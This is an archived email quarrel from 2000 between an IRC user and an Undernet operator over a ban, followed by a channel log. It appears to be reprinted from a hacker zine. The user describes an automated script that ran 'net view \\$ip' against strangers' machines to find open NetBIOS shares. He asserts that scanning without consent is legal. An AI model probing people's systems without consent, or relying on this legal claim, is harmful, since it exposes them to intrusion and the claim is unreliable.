Oh really? That's not exactly true, now is it. The second I logged in today (as the log of today shows, I've attached it to this message) you made a public comment about me scanning people (not exactly true, nor correct). I responded and plainly told you I had turned the script off, because I was tired of explaining shared drives to people. Actually, you're the first who didn't know about the problem. Since my little run in (which I sent to abuse@undernet) with you last night. I then set away.. I was gone maybe 16 minutes.. I went to get some food at Burger King... When I came back, YOU GLINED me. I flat out told you the script was no longer active; YOU THEN GLINED ME AFTER I left. Nah, I didn't do anything against undernet policy CiCi, and you damn well know it.

> with an attitude from you that you were very much entitled to invade and compromise machines when

Not true. You said in channel that I was hacking (I have that log too) chaplain. You also informed me I had been reported to the authorities; and should be expecting a call from his lawyer soon. I'm still waiting for that call btw.

> Don't think for one minute that this is either legal or appreciated using Undernet bandwidth.

Real network aware one you are... I wasn't using undernet bandwidth running my script... And what my script was doing is damn sure not illegal. Unless you're going to tell me undernet's proxy scans of me every time I connect is also illegal? I didn't do anything different. I didn't map any of his drives to my system. (I only knew that he had that available). I was nice enough to tell him he had a problem.

> If this is repeated by you when your gline expires, expect another one.

LOL! Fine. Expect an email with logs [email protected] every time you do so. I'm not one usually for getting glines. Nice try, CiCi.

It's obvious you have a personal problem with me, That's fine. Still not a reason for you to abuse your own network's policy and gline me for it. Glining me from your server would be different, but... Personal problems can easily be resolved via ignore. Not to mention the fellow you glined last night for swearing in a channel you don't even op in. I've got that log too ;p

I've also heard from others (and I'm sure they have logs) that you've been abusing your Oline for some time now. glining people for channel matters; Of which you have no status in. Just because you "hangout" in a channel doesn't give you the right to gline people from the entire undernet; That's what the channel has ops for.

I carbon copied this email to Gator, I simply don't trust you enough to send him copies of this entire email. You quoted me out of context once already.

The log file is kinda large; scroll down for the relevant info.

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

> Gator

From L. Maurer Sun Sep 10 13:03:41 2000
X-Apparently-To: [email protected] via web1602.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta116.mail.yahoo.com with SMTP; 10 Sep 2000 13:18:21 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <[email protected]> sender: <[email protected]> id <mT/[email protected]>; Sun, 10 Sep 2000 15:01:52 -0500 (CDT)
Message-Id: <3.0.32.20000910150340.00ce3410@mail.iadfw.net>
X-Sender: [email protected]
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 10 Sep 2000 15:03:41 -0500
To: John Grahms <[email protected]>
From: "L. Maurer" <[email protected]>
Subject: Re: [Abuse] Hello
CC: [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 5115


At 05:18 PM 9/9/00 -0700, John Grahms wrote:
>Incorrect. And I have logs not only from me to prove this, but from others present during the convo. You're definitely in the wrong. I did not invade ANY machines, and I'd love to see your proof stating otherwise.

Then explain how you were pasting back private chat logs that Chaplain had with others :/ When I first chatted with you about this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this. Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact.

>Not true. You said in channel that I was hacking (I have that log too) chaplain.

I'm not Chaplain. Get your people straight. There is more than one person here who has been affected by your actions and AFAIK Chaplain isn't reading this email.

>You also informed me I had been reported to the authorities; and should be expecting a call from his lawyer soon. I'm still waiting for that call btw.

I told you nothing of the sort. Once again, get your people straight. It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit. That's all I know about that and that's all I want to know about it.

>Real network aware one you are... I wasn't using undernet bandwidth running my script... And what my script was doing is damn sure not illegal. Unless you're going to tell me undernet's proxy scans of me every time I connect is also illegal? I didn't do anything different.

OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people you were scanning. You were scanning everyone that entered a channel on Undernet without their consent. The "consent" part is the difference between your scans and the proxy scans Undernet does. If you read the motd of most servers, you'll see that it is discussed there. If users don't want to be scanned for the most commonly abused ports being open, they are free to disconnect from Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.

>I didn't map any of his drives to my system. (I only knew that he had that available). I was nice enough to tell him he had a problem.

Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.

>It's obvious you have a personal problem with me, That's fine. Still not a reason for you to abuse your own network's policy and gline me for it. Glining me from your server would be different, but... Personal problems can easily be resolved via ignore.

I don't have a personal problem with you so the rest of the above paragraph is of no concern. My problem with you was that you were sitting on Undernet scanning the machines of each person joining a channel.

>Not to mention the fellow you glined last night for swearing in a channel you don't even op in. I've got that log too ;p
>
>I've also heard from others (and I'm sure they have logs) that you've been abusing your Oline for some time now. glining people for channel matters; Of which you have no status in. Just because you "hangout" in a channel doesn't give you the right to gline people from the entire undernet; That's what the channel has ops for.

I was told yesterday that I had been accepted as an Op in #christian. I have now declined that offer until this matter is settled. Once again, scanning for open ports and then intimidating the machine owner when they say something you dislike borders on extortion and it's certainly not something I can sit by and idly watch. If you weren't on undernet, you wouldn't know who joined the channels here.

>I carbon copied this email to Gator, I simply don't trust you enough to send him copies of this entire email. You quoted me out of context once already.

I've carbon copied him on this as well. Gator is a very good person and does many things for Undernet that he never gets the praise he deserves. What you may not be aware of is that both Gator and I got copies of Chaplain's log files sent to abuse the day before. We both have access to the chat log in full context. We both read email sent to [email protected]

>The log file is kinda large; scroll down for the relevant info.

Many of us who work on the net do not open attachments for obvious reasons. I'm sure there is nothing malicious in your logs, but it's just a rule of thumb we use to avoid problems.

The reason I got involved in this was because you were not only scanning people without permission as they entered that channel, but also because you were using the information from those scans to threaten people when they did not behave in the manner you desired. If you have indeed stopped scanning people as they enter a channel, you have solved the problem that was my issue.

CiCi

From John Grahms Sun Sep 10 20:58:49 2000
Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 10980


--- "L. Maurer" <[email protected]> wrote:

> Then explain how you were pasting back private chat logs that Chaplain had with others :/ When I first

You care to back this up with some evidence CiCi? Any logs created by my machine are available for my use; You don't have any say with what I do with material I log. You don't own not one single file present on my machine, and that includes logs of us chatting. I log for a reason, and this my dear is one of them.


> this, you told me you wouldn't have done anything to him but because he was a smart alec, or something of that nature, you thought you were within your right to do this.

You can't tell me "don't be a smartass" to someone, Sorry. It's not illegal nor against undernet policy to treat somebody with less than perfect respect. Go nanny somebody else.

> Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact.

I didn't hit anybody. And I'm getting pretty sick and tired of your bullshit excuses CiCi. Admit it, You don't like me, so You gline me.

> I'm not Chaplain. Get your people straight. There is more than one person here who has been affected by your actions and AFAIK Chaplain isn't reading this email.

You wanna back this one up as well Please? I like evidence, I'm a strong believer in it. The more BS you talk (which btw, you can't actually back up) the less respect I have for you.

> I told you nothing of the sort. Once again, get your people straight.

OH YES, Yes you did. I have that Log at work; I shall retrieve it. You made it perfectly clear in your own words that I had been reported (laugh laugh) to the authorities for my "hacking" chaplain.

> It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit.

Cici, I've been as patient and forgiving as I'm going to be. The rest of this email may be rude; I'm not trying any longer to make it not be. Had you looked at all on the laws governing this state; Chaplain hasn't got a pot to piss in. However, I can and will win a counter suit; Although I know churches don't have a lot of money, I'll counter sue for the point of it.

> OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people

*yawn* Remember when I said I had lost my patience? Well, get ready for a computer lesson; Seems damn time somebody told you. It doesn't use undernet bandwidth to /whois someone, nor does it really do anything when you /dns somebody. My script didn't use any of your precious bandwidth, because (oh dense one) it establishes direct connection via a socket call. Shall I get any more technical, or can you understand this?

> their consent. The "consent" part is the difference between your scans and the proxy scans Undernet does. If you read the motd of most servers, you'll see that it is discussed there.

Indeed I have, and guess what. If somebody really wanted to "sue" undernet for scanning them, your motd wouldn't do shit for you. Know why? Because it's like a shrinkwrap software license; It won't actually hold up in court. But it sounds good.

> to Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.

Technically, I didn't scan anybody. Second, I don't actually need their permission to scan them. It's not illegal to port scan any machine you desire. It becomes illegal if you attempt to gain unauthorized entry into the machine once you have scanned it. scanning is like knocking on the door or calling somebody's house to see if they're home. For an ircop, You really don't know much about the internet, nor the laws governing it.

> Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.

Still quoting me out of context? :) Why don't you email us a copy of the entire log cici, so we can put it in the proper context. I was nice enough to tell him he had a problem to begin with; You seem to have a very hard time with this very very simple concept. I really don't know what to think of you anymore. I already know your computer knowledge leaves much to be desired, and in my opinion; You aren't qualified to be an ircop.

But lucky for you, It's not in my power to make those decisions.

> I don't have a personal problem with you so the rest of the above paragraph is of no concern.

I'm not letting you wiggle out of this CiCi. Glining me went a little too far. According to the wonderful christian log, You glined me after I had already told you (after your attempt to start shit with me when I joined) that the script was no longer scanning anybody. I set away to get some food, then you glined me. You can't get out of it. That's how it went down, and you know it.

> My problem with you was that you were sitting on Undernet scanning the machines of each person joining a channel.

I'm an op in several security related channels, It is our channels' policy to scan all visitors; or they are not welcome. My script does not currently distinguish between only those channels and all channels I might be visiting in. However, it is to be said; You and Chaplain are the ONLY people I've scanned and informed they had a problem that weren't happy to know. They say I suppose that ignorance is bliss, but in the computer age; this will kill you.

Your problem with me is a personal one, Otherwise you would not have glined me yesterday; As you knew well in fact that I was no longer scanning anybody (As I had told you). How do you defend that gline anyway CiCi? What undernet rule at the time was I in violation of? Please, enlighten me :)

> I was told yesterday that I had been accepted as an Op in #christian.

I don't know. I was speaking with the channel administrator; He assured me I'd have no further problems from you. :) Whether your op status is affected isn't my concern, I just don't want any more hassle from you. I know you've overstepped your authority, and you know it.

> I have now declined that offer until this matter is settled.

The matter can easily be settled, Don't gline me for bullshit, and apologize for the bullshit gline you did set on me, and I'll drop the entire issue.

> Once again, scanning for open ports and then intimidating the machine owner when they say something you dislike borders on extortion and it's

I didn't scan for open ports. Computer lesson number 2 (seems you can't learn any other way, I am forced to be rude) my script sent net view \\$ip one time, which attempts to connect to port 139; For Netbios information, NOT OOB nuking. I already know this is above you, But I'm going to explain exactly what I did anyway; Just because it's beyond you doesn't mean somebody else reading this email won't understand what I'm talking about.

And again, I must ask you to provide proof that I w asintimidating anybody. Sigh, I lose more and morerespect for you with each email me thinks. I don'textort anybody.

> If you weren't on undernet, you wouldn't know who >joined the channels here.

I've been a regular on undernet for several years.I've never had a problem like this before. And it'snot really a problem... You had no valid reason togline me, and you did; And I'm going to press thisissue until it's resolved. If that means I have tomake you look like a total idiot with regard tocomputers, I'll do so (mind you, it wouldn't take a nyeffort; These emails and the logs I have show itwithout a doubt). A wrong must be righted.

CiCi, You know your gline was not legit. You know i t.

Page 400: EZine - Coderz #1

I know it. Why don't you apologize for doing it? Itseems like a christian thing to do.

> I've carbon copied him on this as well. Gator is a
> very good person and does many things for Undernet
> that he never gets praise he deserves.

I've known gator for sometime, he knows some associates I used to frequent with. WarBlade and crew...

> What you may not be aware of is that both Gator and
> I got copies of Chaplians log files sent to abuse
> the day before. We both have access to the chat

Then why are you still quoting it out of context? I didn't do anything illegal to Chaplain; I may have saved him some serious downtime. I do admit tho, If I had known I'd be in this BS for doing it, I'd have not said not one word. In the future, I'll keep my mouth shut. Ignorance is bliss, right? :)

> Many of us who work on the net do not open
> attachments for obvious reasons.

A LOG file is a text file, opening it in notepad will not infect you. Please don't force me to give you a lesson in virus terminology. I have very good withstanding credentials in that field. How many "scriptkiddys" (thats what you called me once right? ;p) do you know in Rolling Stone magazine? :-)

> I'm sure there is nothing malicious in your logs,
> but it's just a rule of thumb we use to avoid
> problems.

Lack of education creates rules that are sometimes not necessary.

> The reason I got involved in this was because you
> were not only scanning people without permission as
> they entered that channel

(a) I don't need their permission. and (b) I don't even have to tell them either beforehand or after that I scanned them. And I don't scan people.

> but also because you were using the information from
> those scans to threaten people when they did not
> behave in the manner you desired.

Nice try! I didn't threaten anybody; I helped his sorry ass out. I didn't use any of the information in any illegal nor immoral manner. I did a christian thing and told the bastard he had a problem. I should have let him suffer with it. Stupidity seems to be incurable.

> If you have indeed stopped
> scanning people as they enter a channel, you have
> solved the problem that was my issue.

Your "issue" isn't of any concern to me anymore. Your gline and abuse of oline is. You glined me after I already told you I stopped, thats just plain outright wrong. I wasn't doing anything against undernet policy to begin with, but to gline me after I already said I wasn't doing it anymore is bullshit. Especially since you didn't gline me on entry, you said a wiseass comment about me in open channel. When I responded I was glined shortly there after. And I bet without a doubt; it had nothing whatsoever to do with chaplain. I strongly suspect you didn't like my response to your wiseass comment.

If theres a lesson to be learned here, it's to allow the stupid and ignorant to remain that way; It's for the best.

Regards,
Raid

PS: I didn't have time to enter gators email; I'm trusting you to send him this intact... See if you can do that. Ok?

__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/

From L. Maurer Sun Sep 10 21:17:04 2000
X-Apparently-To: [email protected] via web1601.mail.yahoo.com
Received: from mail.airmail.net (206.66.12.40) by mta430.mail.yahoo.com with SMTP; 11 Sep 2000 02:00:47 -0700 (PDT)
Received: from faith from [204.181.101.66] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <[email protected]> sender: <[email protected]> id <mT/[email protected]>; Sun, 10 Sep 2000 23:15:13 -0500 (CDT)
Message-Id: <3.0.32.20000910231703.01ca0340@mail.iadfw.net>
X-Sender: [email protected]
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Sun, 10 Sep 2000 23:17:04 -0500
To: [email protected]
From: "L. Maurer" <[email protected]>
Subject: Re: [Abuse] Hello
CC: [email protected]
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Length: 12373

Here's a copy of this kid's latest crap. I've had enough of this. Sitting in a channel and port scanning everyone who joins is not a good thing. Continuing his argument with me about it is totally stupid.

Lisa

>X-Persona: <lmaurer>
>Return-Path: <[email protected]>
>Received: from web1603.mail.yahoo.com from [128.11.23.203] by mail.airmail.net (/\##/\ Smail3.1.30.16 #30.438) with smtp for <[email protected]> sender:<[email protected]> id <mP/[email protected]>; Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49 -0000
>Message-ID: <[email protected]>
>Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10 Sep 2000 20:58:49 PDT
>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
>From: John Grahms <[email protected]>
>Subject: Re: [Abuse] Hello
>To: "L. Maurer" <[email protected]>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>
>
>--- "L. Maurer" <[email protected]> wrote:
>
>> Then explain how you were pasting back private chat
>> logs that Chaplain had with others :/ When I first
>
>You care to back this up with some Evidence CiCi? Any logs created by my machine are available for my use; You don't have any say with what I do with material I log. You don't own not one single file present on my machine, and that includes logs of us chatting. I log for a reason, and this my dear is one of them.
>
>> this, you told me you wouldn't have done anything to
>> him but because he was a smart alec, or something of
>> that nature, you thought you were within your right
>> to do this.
>
>You can't tell me "don't be a smartass" to someone, Sorry. It's not illegal nor against undernet policy to treat somebody with less than perfect respect. Go nanny somebody else.
>
>> Just because you CAN hit a child doesn't mean it's the proper thing to do and most of our undernet guests are virtual children. We don't take advantage of that fact.
>
>I didn't hit anybody. And I'm getting pretty sick and tired of your bullshit excuses CiCi. Admit it, You don't like me, so You gline me.
>
>> I'm not Chaplain. Get your people straight. There is more than one person here who has been affected by your actions and AFAIK Chaplain isn't reading this email.
>
>You wanna back this one up as well Please? I like evidence, I'm a strong believer in it. The more BS you talk (which btw, you can't actually back up) the less respect I have for you.
>
>> I told you nothing of the sort. Once again, get your people straight.
>
>OH YES, Yes you did. I have that Log at work; I shall retrieve it. You made it perfectly clear in your own words that I had been reported (laugh laugh) to the authorities for my "hacking" chaplain.
>
>> It is my understanding that Chaplain has contacted his church's attorney and that since you both live in the same state, there is merit for suit.
>
>Cici, I've been as patient and forgiving as I'm going to be. The rest of this email may be rude; I'm not trying any longer to make it not be. Had you looked at all on the laws governing this state; Chaplain hasn't got a pot to piss in. However, I can and will win a counter suit; Although I know churches don't have a lot of money, I'll counter sue for the point of it.
>
>> OK, if you weren't using undernet bandwidth, explain how you knew the IP/host information of the people
>
>*yawn* Remember when I said I had lost my patience? Well, get ready for a computer lesson; Seems damn time somebody told you. It doesn't use undernet bandwidth to /whois someone, nor does it really do anything when you /dns somebody. My script didn't use any of your precious bandwidth, because (oh dense one) it establishes direct connection via a socket call. Shall I get any more technical, or can you understand this?
>
>> their consent. The "consent" part is the difference between your scans and the proxy scans Undernet does. If you read the motd of most servers, you'll see that it is discussed there.
>
>Indeed I have, and guess what. If somebody really wanted to "sue" undernet for scanning them, your motd wouldn't do shit for you. Know why? Because it's like a shrinkwrap software license; It won't actually hold up in court. But it sounds good.
>
>> to Undernet. You made none of this information available to people who entered the channel and you had no permission from them to scan their machines.
>
>Technically, I didn't scan anybody. Second, I don't actually need their permission to scan them. It's not illegal to port scan any machine you desire. It becomes illegal if you attempt to gain unauthorized entry into the machine once you have scanned It. scanning is like knocking on the door or calling somebodys house to see if they're home. For an ircop, You really don't know much about the internet, nor the laws governing it.
>
>> Calling someone a lamer doesn't sound like my idea of nice and telling them to "consider this a threat" doesn't sound very kind either.
>
>Still quoting me out of context? :) Why don't you email us a copy of the entire log cici, so we can put it in the proper context. I was nice enough to tell him he had a problem to begin with; You seem to have a very hard time with this very very simple concept. I really don't know what to think of you anymore. I already know your computer knowledge leaves much to be desired, and in my opinion; You aren't qualified to be an ircop.
>
>But lucky for you, It's not in my power to make those decisions.
>
>> I don't have a personal problem with you so the rest of the above paragraph is of no concern.
>
>I'm not letting you wiggle out of this CiCi. Glining me went a little too far. According to the wonderful christian log, You glined me after I had already told you (after your attempt to start shit with me when I joined) that the script was no longer scanning anybody. I set away to get some food, then you glined me. You can't get out of it.
>That's how it went down, and you know it.
>
>Regards,
>Raid

From John Grahms Mon Sep 11 05:51:48 2000
Received: from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11 Sep 2000 05:51:48 PDT
Date: Mon, 11 Sep 2000 05:51:48 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Length: 813


--- "L. Maurer" <[email protected]> wrote:
> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port
> scanning everyone who joins is not a good thing.
> Continuing his argument with me about it is totally
> stupid.

This Kid isn't a kid. As I've told you once already. You're quite correct; This entire argument is stupid, You don't know the difference between port scanning and netbios; and you don't know a damn thing about netbios. You're clearly not qualified for your position.

You can have enough of it all you like, I didn't port scan anyone and I'd strongly suggest you learn what port scanning is.

Regards,
Raid

From John Grahms Wed Sep 13 09:55:45 2000
Received: from [208.25.255.2] by web1608.mail.yahoo.com; Wed, 13 Sep 2000 09:55:45 PDT
Date: Wed, 13 Sep 2000 09:55:45 -0700 (PDT)
From: John Grahms <[email protected]>
Subject: Re: [Abuse] Hello
To: "L. Maurer" <[email protected]>
CC: [email protected]
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-424238335-968864145=:3039"
Content-Length: 22567

--- "L. Maurer" <[email protected]> wrote:
> Here's a copy of this kid's latest crap. I've had
> enough of this. Sitting in a channel and port
> scanning everyone who joins is not a good thing.
> Continuing his argument with me about it is totally
> stupid.

Hi Lisa,

How many times do I have to tell you I'm not a kid? :) When will you learn this?

That log where you said I would be contacted by the authorities has been attached. I've also forwarded an email from you to the administration of Christian; They were as shocked to find you had been accepted as an Op as I was. Next time you try BSing your way out of something, make sure you have all your bases covered.

You also asked in a previous email to me How I was showing private logs between chaplain and somebody else? I didn't read that section of the email beforehand; I've gone back and read them. How DARE you even accuse me of something like that? I did NOT at any time get any logs that my computer didn't create. And I am requesting, Nay.. Demanding you show some proof for these outrageous claims you've made against me.

You realize CiCi, it's a good thing from a legal/money aspect this is IRC; Because if you were pulling this shit in real life, I'd sue the living shit out of you.

Since I don't normally log from work, what is attached is a buffer save. (I saved it just after you left the channel, I figured it would come in handy).

I'm looking forward to your next installment of lies.

Regards,
Raid

PS: I've carbon copied this email to myself For archive purposes.

-- I don't remember when this took place or how it really fits into my article. LoL. Ah well.

Session Start: Sat Sep 09 00:00:00 2000
[00:00] <Jubei> I don't like the appointed senate
[00:00] <gen|c0de> then it was passed to the public, where it became affectionatly known as the internet and the public made it boom
[00:00] <Jubei> Nor do I like the heavy beauracracy... but for all that it's okay
[00:00] <damrekcah> gen|c0de: it was called ARPAnet
[00:00] *** fayth ([email protected]) has joined #christian
[00:00] <Vote4Bush> lan.. im just tired of the jr thing. he's not a jr, whereas mr al gore IS
[00:00] <gen|c0de> arpa
[00:00] <gen|c0de> yea
[00:00] <gen|c0de> sorry
[00:00] <damrekcah> or DARPA.. i can't remember... darpanet i think
[00:00] *** `Paradox ([email protected]) has left #christian
[00:00] <gen|c0de> it was ARPAnet
[00:00] <CiCi> it was just arpa
[00:01] <gen|c0de> regardless
[00:01] <CiCi> and it didn't have a .net
[00:01] <Lanfear`> vote: how bout we just call him Bubba? ;)
[00:01] <Jubei> Though my government could certainly use reform... but then there has never been a perfect government either
[00:01] <Vote4Bush> dubya is fine with me
[00:01] <Vote4Bush> clinton is bubba
[00:01] <Lanfear`> no.. I said BUBBA ;)
[00:01] <Dovi-dude> Jubei, no, trying to say that Neo in the matrix was more like what the Jewish messiah was percieved to be, rather than what jesus was like
[00:01] *** cierra ([email protected]) has left #christian
[00:01] <Jubei> Lanfear> Check side window please
[00:01] <gen|c0de> net not .net
[00:01] <Jubei> Ah, I never saw the Matrix
[00:01] <damrekcah> one of my professors is getting millions of dollars in research funding for creating new faster networks for the military
[00:01] <Vote4Bush> i know whatcha said
[00:01] <Dovi-dude> a warleader, destined to free his people
[00:01] <damrekcah> darpa is funding him
[00:01] <gen|c0de> the military doesnt need speed
[00:01] <CiCi> ok gen I"m sure you know more than I do, I was only trained by the folks involed in arpa :)
[00:02] <Lanfear`> jubei: I don't see anything in it from you recently
[00:02] <gen|c0de> CiCi: is that why you didnt even know about netbios shares?
[00:02] <damrekcah> gen|c0de: what it is about is creating high speed wireless networks in battlezones....
[00:02] *** `Ash` ([email protected]) has left #christian
[00:02] <Jubei> Dovi> I don't think that's what the jews beleived at all. The young hot-headed jews who want to fight maybe, but not the jewish religious authorities or scholars
[00:02] <damrekcah> that's what he's doing
[00:02] <Dovi-dude> ah, Jubei you should see it. Excellent film, raised the standards for movie sf :)
[00:02] <gen|c0de> damrekcah: doesnt matter they cant secure it worth a shit
[00:02] *** wallace-7 ([email protected]) has left #christian
[00:02] <gen|c0de> the enemy will use their bandwidth
[00:03] <gen|c0de> lol
[00:03] <Colin^> gen|c0de watch the language
[00:03] *** HARDPENIS ([email protected]) has joined #christian
[00:03] *** logos3 sets mode: +b HARDPENIS!*@*
[00:03] <CiCi> gen I know about netbios shares :) and I don't threaten to destroy people's machines when they're open... it's called maturity, mabe you've heard of it
[00:03] *** HARDPENIS was kicked by logos3 (banned: That nick is inappropriate on this channel)
[00:03] *** BrownEye ([email protected]) has joined #christian
[00:03] *** Colin^ sets mode: +b *!*DIE@*.rcn.com
[00:03] *** BrownEye was kicked by logos3 (Banned)
[00:03] *** ramdac ([email protected]) Quit (Ping timeout for ramdac[1Cust114.tnt2.ruston.la.da.uu.net])
[00:03] <gen|c0de> CiCi: speaking of maturity, was that supposed to be a subtle insult?
[00:03] *** Maverick ([email protected]) has joined #christian
[00:03] <Jubei> They just beleived in the rise of a ruler that would guarantee the establishment of good and order in the world.
[00:03] <gen|c0de> raid is a little ummm...how would you say? quick to jump the gun?
[00:03] <gen|c0de> but hes a good guy
[00:04] <Raid> shrug
[00:04] <damrekcah> gen|c0de: do you honestly believe that we can't secure our networks? we have tons of phds working on this project... all of which probably know maybe *a little* bit more about computer networks than you do
[00:04] <CiCi> gen I've had enough of your crap both in private message and in this channel, I'm leaving and I hope you learn manners soon
[00:04] *** CiCi ([email protected]) has left #christian
[00:04] <Dovi-dude> depends, Jubei. I'd have to research a bit more on that.
[00:04] *** newzeal ([email protected]) has joined #christian
[00:04] <Maverick> Back.
[00:05] <PaganJoy> wb Maverick
[00:05] <Vote4Bush> doo de dop bu dee doo le da dit de doo
[00:05] <rts> hmm. Really, there's no such thing as a "secure network", so long as it is connected to the outside world in some way
[00:05] <Dovi-dude> wb Mav
[00:05] *** Nell` ([email protected]) Quit (Wishing you peace, love and Souuuuuuuulll train! - Don Cornelius)
[00:05] <Maverick> Thanks.
[00:05] <Raid> rts: thats supposed to be one of the first things you learn regarding networks.
[00:05] * Lanfear` thinks cici is starting to sound like chap ;)
[00:05] <damrekcah> rts: but its not connected to the outside world!!!!!!! we aren't talking about the internet here
[00:05] <Raid> Lanfear`: careful now, she might gline you. ;p
[00:05] <gen|c0de> damrekcah: I think that the recent attacks against like the pentagon and the whitehouse where people used techniques that are wicked outdated to get access to the server proves we dont
[00:05] <Vote4Bush> is anyone doing something fun this weekend?
[00:06] <rts> Raid: indeed
[00:06] <gen|c0de> cici: ive been very respectful towards you, to the point where its almost making me sick, and Im the one who needs to learn manners?
[00:06] <rts> damrekcah: your network is in no way connected to the outside?
[00:06] <Raid> The only secure (as can be) computer is one that has NO outside connection.
[00:06] <Raid> not even a dialup one.
[00:06] *** ^dan- ([email protected]) has joined #christian
[00:06] <Colin^> gen|c0de she is gone
[00:06] <gen|c0de> oh
[00:06] *** Colin^ sets mode: +b *!*[email protected].*
[00:06] *** fayth was kicked by Colin^ (message me please)
[00:06] <damrekcah> not my network, the high speed military network they are developing
[00:06] <damrekcah> the wireless done
[00:06] <damrekcah> one
[00:06] <gen|c0de> ah yes
[00:07] <gen|c0de> soon we will have wireless network sniffers
[00:07] <gen|c0de> wont even have to be connected to the network
[00:07] *** ironic^^ ([email protected]) has joined #christian
[00:07] <damrekcah> it can be secured
[00:07] <rts> heh... just send a flock of birds up to knock that one down :)
[00:07] <gen|c0de> damrekcah: do you remember when whitehouse.gov got defaced?
[00:07] <Re[D]eemd> since wireless is broadcast by radio wave......you will open yourself to all kinds of security holes
[00:08] <damrekcah> no, but whitehouse.gov isn't part of the pentagon and dod which has a lot of sensitive info
[00:08] *** logos3 sets mode: -b HARDPENIS!*@*
[00:08] <gen|c0de> that attack was VERY old ( phf exploit ) you can hardly find any computer still running it
[00:08] <gen|c0de> ok dam
[00:08] <gen|c0de> a while back DISA I believe it was got hacked
[00:08] <gen|c0de> wanna know how?
[00:08] <Dovi-dude> eventually the safest thing to do, if you need high security, would probably be to store records offline :)
[00:08] * Maverick checks out the Matrix as Messiah movie site.
[00:08] * Maverick takes the Red Pill.
[00:08] <Vote4Bush> red pill eh?
[00:08] <gen|c0de> the attacked an employee's home computer and then let him log in
[00:08] <gen|c0de> the pentagon's be hacked thousands of times
[00:09] <gen|c0de> only a few have gone public
[00:09] <damrekcah> gen|c0de the pentagon and DOD have security holes on different levels on purpose so they can catch the people
[00:09] <gen|c0de> the most public one used brute force cracking, which is a form of password guessing
[00:09] <Raid> damrekcah: Uhh, No...
[00:09] *** HotPink ([email protected]) has joined #christian
[00:09] <HotPink> hey
[00:09] <gen|c0de> damrekcah: its called a honeypot, and none of what ive mentioned we honeypots
[00:09] <Raid> damrekcah: If you believe most of the hackers get caught, your sadly mistaken.
[00:09] <Vote4Bush> hey hotpink
[00:10] <Dovi-dude> hi hotpink
[00:10] <gen|c0de> when the whitehouse got hacked
[00:10] <damrekcah> raid: i'm not saying that.. i'm just saying how its setup
[00:10] <gen|c0de> it was by stupid people
[00:10] <damrekcah> i'm tired of talking about this
[00:10] <gen|c0de> i know them
[00:10] <gen|c0de> they got caught
[00:10] <Raid> lol
[00:10] <damrekcah> i'm going to listen to some music
[00:10] <damrekcah> bye
[00:10] *** damrekcah ([email protected]) has left #christian

Page 412: EZine - Coderz #1

[00:10] <HotPink> yo[00:10] <gen|c0de> but what about the hundreds of a ttacks that followed their arrest[00:10] <gen|c0de> no offense[00:11] <gen|c0de> but how come christians get huff y puffy and leave when their wrong?[00:11] <HotPink> not all christians do[00:11] <HotPink> please don't generalize[00:11] <rts> gen|c0de: even if they're right: it's the disagreement they don't like, I think[00:11] <gen|c0de> yes, i shouldnt have generalized[00:11] <HotPink> were humans just like anyone else with opinions[00:12] <gen|c0de> rts: I just moved away from tuls a ok, they love to argue when their right[00:12] <gen|c0de> sorry again generalizitation[00:12] <gen|c0de> i used to work next door to oral roberts university[00:12] <HotPink> it's cool[00:12] <HotPink> just making a point[00:12] <HotPink> :)[00:12] <rts> gen|c0de: heh. Looneyville by the sou nds of it[00:12] <gen|c0de> well accross the street[00:12] <gen|c0de> rts: they've got two of the larg est christian colleges there are[00:13] <rts> gen|c0de: they = Tulsa or they = Oral Roberts?[00:13] <gen|c0de> ah yes rheama ( sp? )[00:13] <gen|c0de> tula[00:13] <gen|c0de> oru is one of the colleges[00:13] *** creeper has left IRC[00:13] <gen|c0de> rheama bought just about everyth ing in this town[00:13] *** Kozubchik ([email protected]) has joined #christian[00:13] *** ^dan- is now known as dan-[00:13] <gen|c0de> and strictly 